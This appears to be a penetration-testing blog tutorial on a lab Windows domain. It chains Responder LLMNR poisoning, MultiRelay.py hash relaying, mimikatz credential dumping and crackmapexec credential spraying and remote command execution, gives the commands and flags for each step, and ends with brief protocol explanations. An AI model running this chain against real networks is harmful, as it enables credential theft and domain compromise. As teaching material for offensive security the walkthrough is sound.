For this post, we’re going to do a scenario-based usage of the following tools: responder, MultiRelay.py, mimikatz, and crackmapexec.
We are on the internal network of a Windows domain.
Users are Local Administrators on local workstations.
Domain Administrators have separate admin accounts from their normal accounts, but login with their Domain Administrator account on the same workstation.
We have already scanned the network with NMap and have found the live hosts.
SMB Signing is disabled on workstations
WDigest is on.
LLMNR is enabled.
OS: Windows Server 2008
Services: Active Directory Directory Services, DNS
Logged On Users: kcharles (domain administrator)
OS: Windows 7
Services: Local workstation
Logged On Users: sleaf (domain user/local administrator), sleafadmin (domain administrator)
OS: Windows 7
Services: Local Workstation
Logged On users: jegghead (domain user/local administrator)
OS: Kali Linux
Services: This is our attack machine.
Logged On Users: me 😉
Setting up our attack machine:
Do the usual (eg, apt-get update, apt-get upgrade) Install crackmapexec: apt-get install crackmapexec
Let’s do this!
First, let’s setup responder. We’ll have to edit the responder settings to turn off HTTP and SMB. In Kali Linux, it can be found here:
/usr/share/responder and will be named
We can go ahead and turn responder on. We’ll be using the flags: -I and -rv.
You can see what interface you’re using by using ifconfig:
Alright, now let’s startup responder.
!(/img/Responder/responderstart.png) If we wanted to check for machines on the subnet with SMB signing not enabled, we can use RunFinger.py which is in the responder toolset. On Kali Linux, you can find it at:
/usr/share/responder/tools named RunFinger.py```
And all you’d do is:
!(/img/Responder/runfinger.png) Now, let’s setup MultiRelay.py. This is a tool in the responder toolset. You can find it in Kali Linux at:
/usr/share/responder/tools named MultiRelay.py```
We’ll start MultiRelay by pointing it at a target (-t) and using all users (-u ALL).
!(/img/Responder/multirelaystart.png) Remember that sleaf and sleafadmin are logged into this Windows 7 machine. Now, anyone who has used Responder knows that it can take a bit to get any good traffic. We’d be waiting for someone to try to access something we can poison, so for the purpose of this demo, we’re going to have jegghead navigate to a share that doesn’t exist. !(/img/Responder/testshare.png) You’ll see that responder picks up on this LLMNR and poisons the request. !(/img/Responder/respondertestshare.png) Now, we’ll see in our MultiRelay.py output that we’ve successfully poisoned the LLMNR request and relayed the hash of jegghead to 10.0.2.4 where she had local administrator. We now have LocalSystem privileges on 10.0.2.4. !(/img/Responder/multirelayoutput.png) From here, we can run commands built-in to this Responder interactive shell. For this demo, we are going to run Mimikatz. We can do this within the shell by doing: ```mimi sekurlsa::logonpasswords``` Here we get sleaf’s password: !(/img/Responder/sleaf.png) And because sleaf used their admin account on the same machine, we get sleafadmin: !(/img/Responder/sleafadmin.png) Woot woot. Now, we have the credentials of a domain administrator! So, now we’ve used responder, multirelay, and mimikatz. So why don’t we just use these credentials to remote desktop? We could if available. We can do many things. We could use Powershell sessions, wmic, and more but for now, we’ll use crackmapexec since it’s run in memory or items that aren’t often audited or monitored. This next tool is called crackmapexec and it can be used for many uses, but we’ll focus on a few. Let’s spray our credentials to find who’s logged in where. We can do this by pointing crackmapexec at the subnet and passing the creds:
crackmapexec 10.0.2.0/24 -u ‘sleafadmin’ -p ‘[email protected]’ –lusers```
This is definitely useful if we know that the user we have compromised has local administrator on all local workstations. Let’s say sleaf was an admin that didn’t login to her admin account on her local workstation. We could use jegghead’s account to spray around the subnet looking for an admin that did.
We could also spray mimikatz trying to get credentials. To show that all you need is local administrator on the machines, we’ll use jegghead’s account. The machines that show “(Pwn3d!)” next to them mean that she’s local administrator on that machine.
!(/img/Responder/mimikatspray.png) The reason you’re seeing “Waiting on x host(s)” is because the network is slow, but you’ll see jegghead was local administrator on the workstations but not the server. Now, let’s look at some of the other features. With the -x switch, we can run commands directly on the machine we target. We’ll be targeting the server (10.0.2.15). We’ll be running a command to ping us (10.0.2.6). I’ll have wireshark up to show the icmp packets coming back to our attack machine.
crackmapexec 10.0.2.15 -u ‘sleafadmin’ -p ‘[email protected]’ -x ‘ping 10.0.2.6’```
And here’s the wireshark capture:
So, there we are. A few examples of the usage of crackmapexec.
So in this demo, we’ve used responder, runfinger, multirelay, mimikatz, and crackmapexec.
Why Things Work
Remember our scenario.
Let’s go over some definitions and some quick additional information.
LLMNR (Link-Local Multicast Name Resolution)
This is a protocol based on DNS. When trying to find a host, a Windows machine will check its host file then DNS and then LLMNR. LLMNR is limited in that it is not routable. This means only machines on the same subnet can use it. Responder essentially waits for a Windows machine to be like “Who’s X?” and Responder will be like “Oh, I’m X.” If successful, the victim will send their NTLM/NTLMv2 hashed credentials to the attacker.
SMB (Server Message Block)
This is an application layer network protocol. This protocol is mostly used for accessing shares and printers. It can run over TCP on port 445 or via NetBIOS UDP Port 137, 138 and TCP ports 137 and 139. It can also run over legacy protocols, but we won’t cover that.
This allows apps and computers on a LAN to communicate with network hardware and send data across the network.
NT Lan Manager v2 – This is a challenge-response authentication protocol.
This is a protocol for sending cleartext credentials to HTTP and Simple Authentication Security Layer (SASL) applications.
This is a post-exploitation tool that allows for connecting and authenticating to multiple hosts at the same time. Everything is either run in memory, use the WinAPI calls or using the built-in Windows features.
This is a post-exploitation tool that’s known for extracting plaintext passwords, hashes, and kerberos tickets from memory. “Mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets”
“A LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. “